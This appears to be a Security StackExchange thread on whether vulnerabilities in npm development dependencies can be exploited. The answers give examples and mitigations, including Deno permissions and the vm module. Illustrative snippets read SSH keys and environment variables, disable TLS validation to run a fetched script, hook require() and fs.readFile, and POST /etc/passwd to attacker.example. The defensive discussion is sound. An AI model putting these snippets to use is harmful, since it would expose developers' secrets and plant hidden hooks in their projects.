7

I am well aware that the best approach is to update any dependency, no matter whether it is a development dependency or a runtime/production dependency.

But from a research perspective, I want to know whether a vulnerability in a development dependency actually has a chance of being exploited.

Let's take JavaScript as an example, which uses npm as its central package registry.

According to the definition, devDependencies (development dependencies) should contain packages that are used during development or to build your bundle, for example ESLint (linter), Mocha (test framework), and Webpack (module bundler).

Are the vulnerabilities in those development dependencies or other related development dependencies exploitable during the development phase? If yes, then are there any examples?

Note: The answers to other related questions mention supply chain attacks. However, from what I know, the key to a supply chain attack is injecting malicious code into development dependencies, as in the well-known SolarWinds attack.

My question is different: in this case I am asking whether attackers can exploit a vulnerability in the development dependency itself to inject malicious code, so that the (originally benign) development dependency effectively becomes malicious.

I would like to repeat myself:

What I am asking is whether an attacker can exploit a vulnerability in a "benign" development dependency to harm the software I am developing, during the development phase.

Any real-world examples would be great.

I would also like to know about possible mitigation options.

Sir Muffington
LGDGODV
  • You can literally just create this scenario out of thin air. Take any random old package, look at the exploits, and right there, it is exploitable. If you're using v1, you did not upgrade, but they fixed it in v2, that vulnerability is sitting in your old package. I have no idea why this needs to be asked. – Nelson Oct 19 '21 at 03:30
  • @Nelson, I am referring to "development dependency" here instead of runtime dependencies. Specifically, I want to know whether there are real-world exploits of such scenarios since many vulnerabilities are not exploitable or very hard to exploit. – LGDGODV Oct 19 '21 at 04:19
  • You're basically asking "is an unexploitable vulnerability exploitable?" which is an absurd question. You already claimed that these vulnerabilities are "not exploitable or very hard to exploit". The point is if you trust your other defenses enough, then you can do whatever you want. You didn't specify how you arrived at your initial premise. If you're asking a more general question, say "What are the attack vectors in a vulnerable development dependency?" then people can answer. – Nelson Oct 19 '21 at 04:25
  • @LGDGODV this appears like a question within my expertise, but could you please clarify what you ask? Your title appears to be a bit misleading as well. Are you talking about package vulns visible in this case when you run `npm audit`? – Sir Muffington Oct 19 '21 at 19:25
  • @SirMuffington thanks. Right, I am thinking about the vulnerabilities that reside in devDependencies. Are they exploitable when I am using those devDependencies to develop some software? If yes, are there any real-world exploits like this? For example, during my development phase, is it possible for an attacker to exploit a vulnerability residing in a development dependency (such as ESLint, Webpack, Codecov) to inject malicious code into the software I am developing? Real-world examples are better. Thanks. – LGDGODV Oct 20 '21 at 05:52
  • @LGDGODV I get the gist of it now, thanks. It's actually a brilliant question, let me summarize it all in an answer. – Sir Muffington Oct 20 '21 at 16:12
  • @LGDGODV let me know if you need more examples :-) I added the `event-stream` vulnerability, since it was the one that made headlines. – Sir Muffington Oct 20 '21 at 17:10

2 Answers

6

It depends on the vulnerability, and on the threat environment (as is true for every component, not just development ones). Here are a few (generic) examples:

  1. A tool that fetches an external script from a specified location and executes it. Vulnerability: The library fetches the script over HTTPS but does not validate the certificate. Exploitable: YES, a man-in-the-middle network attacker can replace the expected, trusted script with a malicious one to gain code execution on your machine (see the sketch after this list).
  2. An application framework that, when launched for debugging, starts the application on one port and a debug service on another. The debug service can be used to control the program execution. Vulnerability: The debug service listens on all interfaces and is unauthenticated. Exploitable: YES, either a network attacker (if not blocked by a firewall) or a low-privilege user on the same host can connect to the debug server to gain control of the application, resulting in arbitrary code execution.
  3. Same as above, but the debug interface is instead a local (Unix) socket. Vulnerability: The socket is globally accessible. Exploitable: PROBABLY, in that any other user (or process running as another user) on your system can use the local socket to gain code execution as you. However, if the machine is single-user (no other users have code running) and the server doesn't have higher privileges than anything else (no opportunity for EoP), then it doesn't matter in that case.
  4. A tool that cryptographically signs publishable files. Vulnerability: The tool incorrectly truncates signatures longer than 4096 bits, resulting in less-secure and incorrect signatures. Exploitable: UNLIKELY, since RSA keys longer than 4096 bits are quite uncommon in practice; 4096-bit RSA keys are already quite secure. Additionally, if you did use one, you'd hopefully notice that the signature doesn't validate. If you didn't notice, that could cause problems for the consumer of your published files (which might be your own company): either they can't validate the files, or they use a validator that does accept them (because it performs the same truncation), in which case the truncation makes it much easier to modify the files without invalidating the signature.
  5. A tool that generates files from templates. Vulnerability: The tool may incorrectly place the generated files relative to the system root rather than the current directory. Exploitable: UNLIKELY, as the chances of the generated files accidentally overwriting anything important are very low unless their directory structure happens to resemble the system root, and the tool presumably does not run with elevated privileges and thus can't overwrite most files anyhow. A dependency that appears benign could exploit this to overwrite e.g. your ~/.ssh/authorized_keys with a malicious value (if the vulnerable tool is used with it) without directly containing malicious code itself, but such an attack is very unlikely (and would technically be a supply-chain attack, just sneakily riding another tool's bugs).
  6. A tool that, among other things, can update Jira work items based on your commit messages. Vulnerability: The Jira integration first attempts HTTP for every request, only upgrading to HTTPS if redirected (as Jira normally does). Exploitable: DEPENDS on whether you use Jira or not. If you do, a network attacker can steal your Jira credentials and make changes as you. If not, though, this vulnerability is irrelevant to your environment.
  7. A tool that uploads the results of a static analysis to a server over HTTPS. Vulnerability: The tool packages a version of OpenSSL that contains a denial-of-service vulnerability when used as a TLS server. Exploitable: NO, the tool does not act as a TLS server, only as a TLS client, so the vulnerability is irrelevant to its use case.
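To make the first example concrete, here is a minimal sketch (not taken from any real package; the URL and function name are made up) of the kind of code that creates vulnerability 1: fetching a remote script over HTTPS with certificate validation disabled and then executing it.

```js
// Hypothetical build helper illustrating example 1.
// `rejectUnauthorized: false` disables TLS certificate validation, so a
// man-in-the-middle attacker can substitute a malicious script.
const https = require('https');
const vm = require('vm');

function fetchAndRun(url) {
  https.get(url, { rejectUnauthorized: false }, (res) => { // <-- the vulnerability
    let body = '';
    res.on('data', (chunk) => { body += chunk; });
    res.on('end', () => {
      // Whatever came back over the (unauthenticated) connection now runs
      // with the full privileges of the developer's account.
      vm.runInThisContext(body);
    });
  });
}

fetchAndRun('https://tools.example.com/build-helper.js');
```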
CBHacking
  • This answer misses a lot of the main question points apparently and only lists examples without providing any real-world examples so imo it's only a partial answer – Munchkin Oct 26 '21 at 10:59
4

When you run the npm start command with the environment set to development, or a special command such as npm run dev (where dev is a script, defined in package.json, that starts up a local development environment), the devDependencies specified in package.json get executed. In some cases it is up to the user to first include the required files, but there are exceptions such as fake (simulated) APIs and localhost servers like the one used by Angular (you run it with ng serve, which by default does not even use a self-signed SSL certificate). The real danger is that Bash/PowerShell/Batch files and binaries can also be executed this way, which is a big yikes!
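As a sketch of how that wiring looks (the package names and version ranges below are only illustrative), a typical package.json ties devDependencies directly into the commands developers run every day:

```json
{
  "name": "my-app",
  "scripts": {
    "dev": "webpack serve --mode development",
    "lint": "eslint src/",
    "test": "mocha"
  },
  "devDependencies": {
    "webpack": "^5.0.0",
    "webpack-cli": "^4.0.0",
    "webpack-dev-server": "^4.0.0",
    "eslint": "^8.0.0",
    "mocha": "^9.0.0"
  }
}
```

Every one of those scripts executes code from devDependencies (and their transitive dependencies) with the full privileges of the developer's user account; npm does nothing to sandbox it.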

Now to the main part of the question: what possible harm could it do? This code executes with no isolation at all, despite the fact that V8 (still considered the most secure JavaScript engine in 2021) includes a great sandbox that Google put a lot of work into securing. Going in blind without any code review, it could mean one of the following:

  • Upload and leak your whole source code
  • Destroy your source code
  • Since it has filesystem access, it could mess with your filesystem and, in theory, by extension even install rootkits, for example
  • It could sniff your local network traffic, which nowadays is usually encrypted
  • It could host an evil twin AP
  • Trojans, worms, cryptominers, etc.
  • It could read your network activity
  • It could mess with your packets, send out packets you don't want
  • Mess with your certificates, forge them etc
  • A malicious linter could do the opposite of snyk.io: insert or suggest vulnerabilities in your app, so that the app/API you ship to production is vulnerable
  • In theory even damage your hardware
  • Obfuscate itself to hide malicious code
  • Combinations of these and more...

...and other things that malware can generally do. Security StackExchange is full of other suggestions for how it might be abused.

There is no built-in permission system or anything like that, so the possibilities are pretty much endless.
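As a minimal sketch of what "no permission system" means in practice (the paths below are only illustrative), any module pulled in during a build, lint or test run executes with the developer's full user privileges:

```js
// Hypothetical snippet that could hide inside any devDependency (a linter
// plugin, a build step, a test helper). Node.js imposes no permission
// boundary on it whatsoever.
const fs = require('fs');
const os = require('os');
const path = require('path');

// Full read access to the developer's home directory...
const sshDir = path.join(os.homedir(), '.ssh');
if (fs.existsSync(sshDir)) {
  console.log('Readable secrets:', fs.readdirSync(sshDir));
}

// ...and to environment variables (API tokens, CI secrets, etc.),
// plus unrestricted outbound network access to send any of it away.
console.log('Environment keys:', Object.keys(process.env));
```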

More realistic examples include vulnerable parsers, which could lead to RCEs etc., and bad crypto, which can easily be broken (this was present in the native crypto library and, if I remember correctly, still is; the documentation used to warn against using some of its methods). See the history of vulnerabilities below.
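As an illustration of the "documented but discouraged" crypto methods (a minimal sketch, not tied to any particular package): crypto.createCipher() derives the key and IV from a password with a weak, salt-less scheme and is deprecated in favour of crypto.createCipheriv() with a proper key-derivation function.

```js
const crypto = require('crypto');

// Deprecated (and removed in newer Node.js releases): derives key and IV
// from the password alone, with no salt and a weak derivation scheme.
// const weak = crypto.createCipher('aes-192-cbc', 'password');

// Recommended: derive the key with a real KDF and use a random IV.
const salt = crypto.randomBytes(16);
const key = crypto.scryptSync('password', salt, 24); // 24 bytes for AES-192
const iv = crypto.randomBytes(16);
const cipher = crypto.createCipheriv('aes-192-cbc', key, iv);
const ciphertext = Buffer.concat([cipher.update('secret', 'utf8'), cipher.final()]);
console.log(ciphertext.toString('hex'));
```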

Now, what about local development servers? Can't they be crawled by bots from the outside, i.e. from the World Wide Web? It depends on your firewall, your router and your local server implementation. Usually local dev servers bind to the localhost interface or the 127.0.0.1 loopback address, which is reachable only from the local machine. I have seen some amateur-made local dev servers bind to the 0.0.0.0 interface on Unix, which is a big yikes if you are reachable from the World Wide Web: your APIs can get brute-forced and, like all complex APIs (again, it depends on your API), open a door for malware onto your machine (I am of course implying that the API gets discovered and has write and execution capabilities, usually via vulnerabilities like LFI etc.).
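The difference is just the bind address. A minimal sketch with Node's built-in http module (the port number is arbitrary):

```js
const http = require('http');

const server = http.createServer((req, res) => {
  res.end('dev server\n');
});

// Reachable only from this machine:
server.listen(3000, '127.0.0.1');

// Reachable on every network interface -- anyone who can route to the
// machine (and is not blocked by a firewall) can reach the dev server:
// server.listen(3000, '0.0.0.0');
```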

How hard is it to review the JavaScript inside modules? Nowadays obfuscation and minification tools are quite advanced; there are companies specialized in this field that promise your JavaScript will not be reverse-engineered with medium effort. For a good example I always point to a popular xkcd comic, which contains obfuscated JavaScript for a right-click menu: https://xkcd.com/1975/

Also, there is a danger of malicious service workers being spawned, and other shenanigans.

If you want maximum security in development and production and want to use JavaScript, I would recommend looking into Deno, which is developed by a team including Ryan Dahl, the original author of Node.js, who thought to himself "hey, I would do better". He gave a talk called "10 Things I Regret About Node.js": https://www.youtube.com/watch?v=M3BM9TB-8yA From approximately 6:13 in the video he admits that the Node.js main event loop has access to all sorts of system calls. Since Node.js is often run as admin/root, this could lead to all the possibilities mentioned above.

If you want to see a more secure infrastructure, look at the 18:59 timestamp in the video.
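Deno inverts the default: a script gets no filesystem or network access unless you grant it explicitly on the command line. A minimal sketch (the file name and host are placeholders):

```js
// leak.js -- under Deno, both calls below are denied unless permissions
// are granted explicitly when the script is started.
const data = await Deno.readTextFile('/etc/passwd');   // needs --allow-read
await fetch('https://attacker.example/exfil', {        // needs --allow-net
  method: 'POST',
  body: data,
});

// deno run leak.js                          -> PermissionDenied
// deno run --allow-read --allow-net leak.js -> runs
```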

Note that npm audit does no actual code analysis; it only reports already-known (published) vulnerabilities, so it does not solve these problems by itself. GitHub security bots and Snyk.io bots, on the other hand, do have the ability to detect such vulnerabilities, as long as the modules are not obfuscated.

What I find especially concerning is that there are certainly no limits set on the following actions:

  • Hijacking require() calls, as is done (with good intentions) by software like Babel, TypeScript tooling, etc.
  • Surprisingly, code can literally override core modules (see the sketch below).
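A minimal sketch of both techniques (purely illustrative, not taken from any real package): once any module runs, it can patch Module.prototype.require and wrap functions on core modules, so every later require() or fs call in the process goes through it.

```js
// Hypothetical sketch: monkey-patching require() and a core module.
const Module = require('module');
const fs = require('fs');

// 1. Hijack require(): every subsequent require() call in this process
//    now passes through this wrapper first. Require hooks such as Babel's
//    register hook or ts-node use the same mechanism legitimately.
const originalRequire = Module.prototype.require;
Module.prototype.require = function (id) {
  console.log('[hooked] require(%s)', id);
  return originalRequire.apply(this, arguments);
};

// 2. Override part of a core module: replace fs.readFile with a wrapper
//    that, in a malicious package, could copy file contents elsewhere.
const originalReadFile = fs.readFile;
fs.readFile = function (...args) {
  console.log('[hooked] fs.readFile(%s)', args[0]);
  return originalReadFile.apply(fs, args);
};
```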

I'm a hardcore coder, what can I do?

I'm glad you asked. The Node.js API (or core modules, whatever you want to call them) contains a VM API; see the vm module documentation for details. With it you can run code in a separate V8 context, but as the documentation states, the maintainers of Node.js explicitly recommend AGAINST running untrusted code inside it, because it is not a security boundary.
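A minimal sketch of the vm module (purely illustrative): the snippet runs against a separate context object instead of the real globals, but as noted above this is not a security mechanism and determined untrusted code can escape it.

```js
const vm = require('vm');

// Run a snippet against an isolated context object instead of the real globals.
const sandbox = { result: 0 };
vm.createContext(sandbox);
vm.runInContext('result = 2 + 2;', sandbox, { timeout: 50 });
console.log(sandbox.result); // 4

// Note: the vm module is NOT a security boundary; untrusted code can break
// out of the context, which is why the maintainers advise against using it
// for untrusted input.
```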

History of vulnerabilities in dev packages

ID: CVE-2022-23812
Title: Arbitrary file overwrite vulnerability in the Node-IPC NPM package

Description: The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files depending on the geolocation of the user's IP address. The maintainer removed the malicious code in version 10.1.3.

CVSS v3.1 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

See also the general HKCERT advice about third-party dependencies.

Not to mention the usual typosquatting.

Sir Muffington